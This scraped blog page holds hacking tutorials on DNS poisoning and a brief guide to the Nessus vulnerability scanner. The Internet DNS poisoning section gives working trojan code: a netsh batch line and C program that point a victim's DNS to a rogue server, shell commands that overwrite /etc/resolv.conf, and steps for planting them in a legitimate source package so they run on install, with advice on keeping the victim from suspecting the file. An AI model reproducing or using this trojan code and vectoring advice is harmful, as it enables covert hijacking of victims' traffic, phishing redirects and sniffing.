-
Categories
-
Meta
-
Pages
-
Recent Posts
-
Plugin created thanks to micro sd card , r4i uk , sd card and r4i goldPowered by Google Translate.
Apr. 08.
Comments Off Before we proceed to DNS Poisoning lets have some look on basics. So lets take look on what is DNS first. You already know internet runs on TCP/IP model or you can say internet protocol stack. TCP/IP stack specifies and uses IP addresses (example : 204.87.98.34) to route data between source and destination computer. Every computer in the world that is connected in network have an IP address. Since remembering IP addresses are difficult each IP address is associated with a name like www.google.com which is also known as domain name. Domain names are easy to remember but original TCP/IP stack needs IP address for communication not the domain name
. So a service has been created to convert these domain names into their respective IP addresses, this service is known as Domain Name Service (DNS), a computer or system which provides this service is known as Domain Name System. Now you can call it a coincidence that Domain Name Service and Domain Name Systemboth end having same abbreviation DNS and the best part they don’t even conflict with each other while using.
A DNS runs on DNS protocol that translates web address into its respective IP address. Now DNS poisoning or DNS spoofing is technique by which an attacker provides wrong IP address to DNS server for misdirecting users to fake websites. Following are types of DNS poisoning, in future post we will cover them briefly,
-
Intranet DNS Spoofing/Poisoning
-
Internet DNS Spoofing/Poisoning
-
Proxy Server DNS Spoofing/Poisoning
-
DNS Cache Spoofing/Poisoning
Intranet DNS poisoning is done over a LAN. It is usually performed over switched network with help of ARP poisoning. You can use Cain And Abel to perform this kinda attack. Internet DNS poisoning can be done over any system across world by changing DNS entries of victim’s computer. In Proxy Server DNS poisoning we change proxy settings of victim to our IP address then redirect victim to fake website. In DNS cache poisoning an attacker changes IP address entries of target website on some specific DNS server then if any person asks that DNS for information it’ll provide fake IP information to it.
Intranet DNS Poisoning
In this post we will discus our very first method of poisoning DNS i.e Intranet DNS poisoning. Intranet DNS poisoning attack is done over a LAN which has been ARP poisoned. Since I ‘ll not repeat how to poison ARP, please read my previous tutorial on ARP poisoning. For performing this DNS poisoning attack you’ll need at least three computers connected in LAN for which a same router, switch or computer should act as gateway and any man-in-the-middle attack tool, for this tutorial I am using Cain And Abel
. Make sure your setup matches following diagram.
. Make sure your setup matches following diagram.
Note that this attack works well for switched network, a hub based network will also work but result will not be as effective as switched network. Now Google for Cain And Abel download it and poison ARP table. Now click on APR-DNS from bottom and add a host name to it.
For our example I am poisoning entry of www.Yahoo.com. Now specify IP address of website you want to redirect traffic, if you want to redirect traffic for www.yahoo.com to http://nrupentheking.blogspot.com then click on Resolve type http://nrupentheking.blogspot.com in it and IP address field will take IP address of my blog. So now whenever anyone in LAN will try to browse to yahoo will land on my blog.Now something important, from all DNS poisoning methods Intranet DNS poisoning is easiest and doesn’t require any technical skills because you don’t have to setup a DNS server but for all other methods you must know how to setup DNS server. I will try my best to keep things as easy as I can but as an advise I would recommend you please Google a little and get some information about how to setup a DNS server. If I would have to perform above attack then my choice of tool would be Ettercap I took this tutorial with Cain And Abel just because its easy to use and we covered ARP poisoning using Cain and not Ettercap.
Cain is easy for someone who is beginner so just take this tutorial as start-up piece, after getting little understanding about how DNS poisoning is done, try same with Ettercap. So easiest DNS poisoning method I.e Intranet DNS poisoning is done next time we will see Internet DNS poisoning method. Thanks for reading and keep visiting.
Internet DNS Poisoning
Following is our second tutorial on DNS Poisoning which is Internet DNS Poisoning, also known as Remote DNS Poisoning. This type of DNS poisoning can be done over a single or multiple victims and no matter where your victim is in world, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you’ll have to setup a rouge DNS server somewhere with static IP address and please note that it should be in working condition. Methods of poisoning are different for Windows and Linux systems but happens with help of same entity that is Trojan file.
Here I ‘ll show you how to create DNS poisoning Trojans all you have to do is vector them.
Here I ‘ll show you how to create DNS poisoning Trojans all you have to do is vector them.
For Windows:
For poisoning DNS of victim you must know name of his/her interface or name he/she has set for his/her internet connection. This condition is must for you to poison victim’s DNS if you don’t know their values then use default “Local Area Connection”. Now lets create a DNS spoofing Trojan Batch file. Type following lines in notepad and save it with any name and .bat extension.
netsh interface ip set dns “Local Area Connection” static 115.98.23.45
Above command will set DNS server of victim to 115.98.23.45 , you can change “Local Area Connection” by name of interface or connection if you know it, else always go with default. Now send that file to victim for poisoning his/her DNS entries. If you don’t want to send bat file because your victim might suspect it, then you can create an executable file by compiling following C program.
#include<stdio.h>
#include<stdlib.h>
int main()
{
char *str= “netsh interface ip set dns “Local Area Connection” static 115.98.23.45”;
system(str);
return 0 ;
}
Read Trojan Software Vectoring to know how to fool victim to execute your Trojan.
For Linux And UNIX:
Linux and UNIX systems save DNS entries in /etc/resolv.conf folder by changing entries in this file can help you poison DNS in Linux and UNIX systems. Now get IP address of working DNS server and IP address of rouge DNS server set by you. Suppose IP address of rouge DNS is 115.98.23.45 and real DNS server is 117.98.23.48. Then type following commands in a text file and save with .sh extension(for example change.sh ).
echo “nameserver 115.98.23.45” > /etc/resolv.conf
echo “nameserver 117.98.23.48” >> /etc/resolv.conf
Now all you have to do is vector this file to victim. For vectoring it get any source code installation package from internet of an interesting software your victim can’t deny to install in his/her system. Extract it and find a shell script in it, place change.sh in that folder, open target shell script in text editor and before it ends type following commands,
chmod +x change.sh
./change.sh
Pack it again and send to your victim for installation once he/she installs software from your source code he/she will be infected. Now sometimes its difficult to find a shell script in package but what is not difficult to find is a C source file. So if you get problem with above method, find a C source file with several functions in it and create following new function in it.
void change12345()
{
char *str;
str= “echo “nameserver 115.98.23.45” > /etc/resolv.conf”;
system(str);
str= “echo “nameserver 117.98.23.48” >> /etc/resolv.conf”;
system(str);
return;
}
And call this function in any other function before it returns something. Pack files again and send it to your victim, your file will execute every time when your victim will launch that program.
Now note that above exploits codes are really very basic, you can modify them according to your needs and if you think they are difficult to understand please get your hands on programming, even if you can understand basic programming you can write your own exploit codes. Please read books section to have a look on which books I recommend you to begin with programming.
Proxy Server DNS Poisoning
For this type of DNS poisoning method an attacker sets up a proxy server on his/her system. Then he/she sets up a rouge DNS and keeps its IP address as primary DNS entry in proxy server system. Now he/she has to convince victim to use proxy server set by him/her. Since proxy server has set up a rouge DNS as its primary DNS all requests will pass through it. Since all traffic passes from your system as proxy server you can sniff all traffic between
victim and site he/she communicates and also perform DNS poisoning attack.
victim and site he/she communicates and also perform DNS poisoning attack.
Mar. 11.
Nessus is one of the well known and most used vulnerability scanner program. Nessus was built for UNIX platform but now also supports Windows platform. Nessus runs as client server program and available as free and professional version. Download and register your e-mail with them and they will send you information about how to register and use it. Once installation is done you will have two icons one with name Nessus Server another with Nessus Client first of all open Nessus Server and add users in it. Then open Nessus Client and log in, after log in you will see interface as follows,
 |
| Please Open Images In New Tab |
First of all you will have to define some scan policy to scan target system. For that click on “Policies” then “Add Policy”. Its not difficult to understand how to define general section in policy but if you don’t know much about different OS and networking I would better suggest let other options to their defaults.
Next step is to add scan, click on “Scan” and then “Add Scan”, type IP address you want to scan else you can also insert a text file with IP addresses of targets but for now just scan your own computer. Once you press “Launch” button your scan will begin. After scan is complete have your look on vulnerabilities found in target system.
For now don’t bother about how to exploit vulnerabilities for hacking purpose that we will cover in “Enumeration” and “Gaining Access/System Hacking” phase. As an honest advice I would recommend you not to limit your self to this tutorial and find more tutorials on www.YouTube.com . Thanks for reading and keep visiting.
-
L0phtCrack Tutorial
March 11th, 2012